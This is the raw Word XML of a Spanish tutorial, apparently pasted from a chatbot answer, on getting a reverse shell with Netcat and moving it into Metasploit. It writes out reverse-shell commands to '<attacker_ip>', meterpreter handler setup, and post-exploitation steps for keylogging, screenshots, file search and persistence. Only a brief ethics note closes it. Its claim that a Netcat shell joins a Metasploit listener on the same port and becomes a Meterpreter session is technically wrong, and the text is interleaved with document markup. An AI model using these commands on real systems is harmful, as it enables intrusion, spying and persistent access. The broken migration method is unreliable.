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Netcat y Metasploit son dos herramientas poderosas que pueden ser utilizadas en conjunto para obtener y manejar shells remotas en sistemas comprometidos. Aquí te explico cómo usar Netcat para obtener una shell remota y luego cómo migrar esa sesión a Metasploit para tener un mayor control y funcionalidades avanzadas.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1: Configuración del Listener con Netcat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Primero, necesitas configurar un listener con Netcat en tu máquina atacante para esperar conexiones desde la máquina víctima.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nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F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-l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indica que Netcat debe escuchar en lugar de conectarse a un puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F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-v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el modo verbose para ver la información detallada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F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-p 4444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especifica el puerto en el que Netcat debe escuchar.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2: Ejecutar el Payload en la Máquina Víctima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En la máquina víctima, puedes ejecutar un comando que conecte de vuelta a tu listener Netcat. Por ejemplo, en una máquina Windows, puedes usar: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nc &lt;attacker_ip&gt; 4444 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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&lt;attacker_ip&gt;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dirección IP de tu máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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-e cmd.exe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especifica el programa que se ejecutará al establecer la conexión (en este caso, el intérprete de comandos de Windows).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En una máquina Linux, puedes usar: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nc &lt;attacker_ip&gt; 4444 -e /bin/bash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ejecutado, deberías obtener una shell en tu máquina atacante.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3: Migrar la Shell de Netcat a Metasploit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Para tener más control sobre la shell obtenida, puedes migrar esta conexión a Metasploit. Aquí están los pasos para hacerlo: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Iniciar Metasploit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Abre Metasploit en tu máquina atacante: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Configurar el Payload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Configura el payload de Metasploit para escuchar en el mismo puerto donde tienes el listener Netcat. Utilizaremos el payload </w:t>
      </w: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multi/handler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el payload </w:t>
      </w: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windows/meterpreter/reverse_tcp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una máquina Windows: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use exploit/multi/handler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payload windows/meterpreter/reverse_tcp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LHOST &lt;attacker_ip&gt;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LPORT 4444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Para Linux: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use exploit/multi/handler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payload linux/x86/meterpreter/reverse_tcp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LHOST &lt;attacker_ip&gt;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LPORT 4444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3. Establecer la Conexión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La shell de Netcat debería conectarse automáticamente al listener de Metasploit, y deberías obtener una sesión de Meterpreter. Puedes listar las sesiones activas usando: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sessions -l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Para interactuar con una sesión específica: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sessions -i &lt;session_id&gt;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4: Post-Explotación con Metasploit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Ahora que tienes una sesión de Meterpreter, puedes usar las numerosas funcionalidades de Metasploit para post-explotación, como:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Obtener información del sistema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meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Capturar capturas de pantalla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meterpreter &gt; screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Registrar pulsaciones de teclas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meterpreter &gt; keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Buscar archivos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meterpreter &gt; search -f *.doc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Mantener el acceso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meterpreter &gt; run persistence -U -i 5 -p 4444 -r &lt;attacker_ip&gt;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Completo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Supongamos que estás utilizando un sistema Windows y has configurado el listener de Netcat y el payload de Metasploit como se describió anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Netcat en el atacante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nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Ejecutar el comando en la víctima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nc &lt;attacker_ip&gt; 4444 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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y ejecutar Metasploit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use exploit/multi/handler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payload windows/meterpreter/reverse_tcp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set LHOST &lt;attacker_ip&gt;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set LPORT 4444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</w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Interactuar con la sesión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sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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F5863">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>sessions -i &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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de Seguridad y Ética</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Permisos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 Asegúrate de tener permiso explícito para realizar estas actividades en el sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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Responsabilidad</w:t>
      </w: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: Utiliza estas técnicas de manera ética y legal. El uso indebido puede tener consecuencias legales graves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F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Al seguir estos pasos, puedes usar Netcat para obtener una shell remota y luego migrar esa sesión a Metasploit para tener un mayor control y funcionalidades avanzadas para la post-explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5863" w:rsidRPr="000F5863" w:rsidRDefault="000F5863" w:rsidP="000F5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863">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>4o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="000F5863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1BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C402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C0B55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3A0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67C4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA8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5715B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="170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763FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6C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59"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="000F5863"/>
    <w:rsid w:val="00E001F3"/>
    <w:rsid w:val="00F0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5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0F5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586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0F586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F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5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586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F58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F5863"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000F5863"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line-clamp-1">
    <w:name w:val="line-clamp-1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="000F5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5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0F5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586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0F586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F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5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586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F58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F5863"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000F5863"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line-clamp-1">
    <w:name w:val="line-clamp-1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="000F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9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2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2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0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3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3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7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9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6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2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7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9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64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7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3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6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6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8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7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3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1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4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7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3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0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3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3332</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-12T02:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-12T02:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>